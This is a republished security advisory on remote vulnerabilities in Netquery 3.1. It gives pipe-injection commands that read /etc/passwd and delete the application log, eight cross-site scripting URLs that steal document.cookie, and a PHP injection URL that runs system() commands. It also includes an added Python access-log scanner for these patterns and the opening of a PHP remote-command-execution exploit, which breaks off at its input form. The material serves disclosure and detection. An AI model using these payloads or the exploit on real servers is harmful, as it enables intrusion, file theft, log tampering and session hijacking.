Netquery Multiple Remote Security Vulnerabilities

2008-04-10 03:02:25 Source: Internet


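Published: 2005-08-02
Updated: 2005-08-02

Affected systems:
Netquery Netquery 3.1
Description:
BUGTRAQ ID: 14373

Netquery is a web-based application that provides network command tools.

Netquery contains multiple remote vulnerabilities that allow a remote attacker to execute arbitrary commands on the host.

Through the "Ping IP Address or Host Name" input text box on the PING panel, a user can use the pipe character to execute arbitrary commands on the target system: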

| cat /etc/passwd

This displays the plaintext password file.

| pwd

This shows the current path.

| rm [pwd_output]/logs/nq_log.txt

Users can browse the plain-text log file by URL:

http://[target]/[path]/logs/nq_log.txt

XSS:
http://[target]/[path]/submit.php?portnum="/><script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/portlist.php?portnum=<script>alert(document.cookie)</script>

Users can also use an online Netquery installation to launch attacks from the HTTP GET request panel:

http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command]).'&command=cat /etc/passwd

<*Source: rgod (rgod@autistici.org)

Link: http://www.packetstormsecurity.org/0507-exploits/netquery31.txt
*>
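
The request patterns listed above can be searched for in a web server access log. The following Python is an added example, not part of the original advisory or of Netquery. The combined log format, the /netquery/ install path, and the ping.php script with its host parameter in the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameters, taken from the XSS URL list in this advisory.
XSS_PARAMS = {
    "submit.php": {"portnum"}, "portlist.php": {"portnum"},
    "nqgeoip.php": {"step"}, "nqgeoip2.php": {"step", "body"},
    "nqports.php": {"step"}, "nqports2.php": {"step", "body"},
}
MARKUP = re.compile(r'[<>"]')   # characters needed to break out into HTML
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return the findings for one access-log line (empty list if clean)."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1]
    findings = []
    if url.path.endswith("/logs/nq_log.txt"):
        findings.append("log-file-read")
    # parse_qsl percent-decodes, so %3Cscript%3E and <script> look the same.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in XSS_PARAMS.get(script, ()) and MARKUP.search(value):
            findings.append(f"xss:{script}:{name}")
        # Assumption: the ping field name is not given in the advisory, so a
        # pipe in any query parameter is flagged. POST bodies are not logged.
        if "|" in value:
            findings.append(f"pipe:{script}:{name}")
    return findings

# Constructed sample lines: documentation addresses, hypothetical /netquery/
# path, and a hypothetical ping.php?host= request in the last line.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Aug/2005:10:00:01 +0000] "GET /netquery/nqports2.php?body=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 512',
    '192.0.2.10 - - [02/Aug/2005:10:00:05 +0000] "GET /netquery/logs/nq_log.txt HTTP/1.1" 200 9000',
    '192.0.2.11 - - [02/Aug/2005:10:01:00 +0000] "GET /netquery/portlist.php?portnum=80 HTTP/1.1" 200 300',
    '192.0.2.12 - - [02/Aug/2005:10:02:00 +0000] "GET /netquery/ping.php?host=example.org%7Cpwd HTTP/1.1" 200 300',
]

def scan(lines):
    """Map line index -> findings for every line that triggered a rule."""
    return {i: f for i, line in enumerate(lines) if (f := classify(line))}

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOG).items():
        print(index, findings)
```

Requests sent by POST leave no parameters in the access log, so this check covers only GET traffic.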

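Test method:

Warning

The following program (method) may be offensive in nature and is intended for security research and teaching only. Use at your own risk!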

<?php
//NETQUERY 3.1 remote commands execution
//by rgod
//http://rgod.altervista.org
//a lot of code for a pipe vulnerability...
//I wrote this to replace that bad perl code swowned in securityfocus...
//run it from your browser...
//make these changes in php.ini if you have troubles
//with this script
//
//allow_call_time_pass_reference = on
//register_globals = On


error_reporting(0);
echo '<head><title>Netquery 3.1 remote commands execution poc exploit by rgod</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body,td,th {color: #00FF00;}
body {background-color: #000000;}
.Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;
font-weight: bold;
font-style: italic;
}
-->
</style></head>
<body>
<p class="Stile6">2.19 01/08/2005</p>
<p class="Stile6">Netquery 3.1 remote commands execution poc exploit by rgod</p>
<p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p>
<p class="Stile6">read this paper about <a href="http://www.rgod.altervista.org/netquery.html" target="_blank">Netquery vulnerability</a></p>
<table width="84%" >
<tr>
<td width="43%">
<form name="form1" method="post" action="'.$PHP_SELF.'?path=value&host=value&port=value&command=value&proxy=value">
<p>
<input type="text" name="host">
<span class="Stile5">hostname (ex: www.sitename.com) </span></p>
<p>
<input type="text" name="path">
<span class="Stile5">path (ex: /netquery/ or just /) </span></p>
<p>
<input type="text" name="port">
<span class="Stile5">specify a port other than 80 (default value) </span></p>
<p>
<input type="text" name="proxy">
<span class="Stile5">send exploit through an HTTP proxy (ip:port) </span></p>
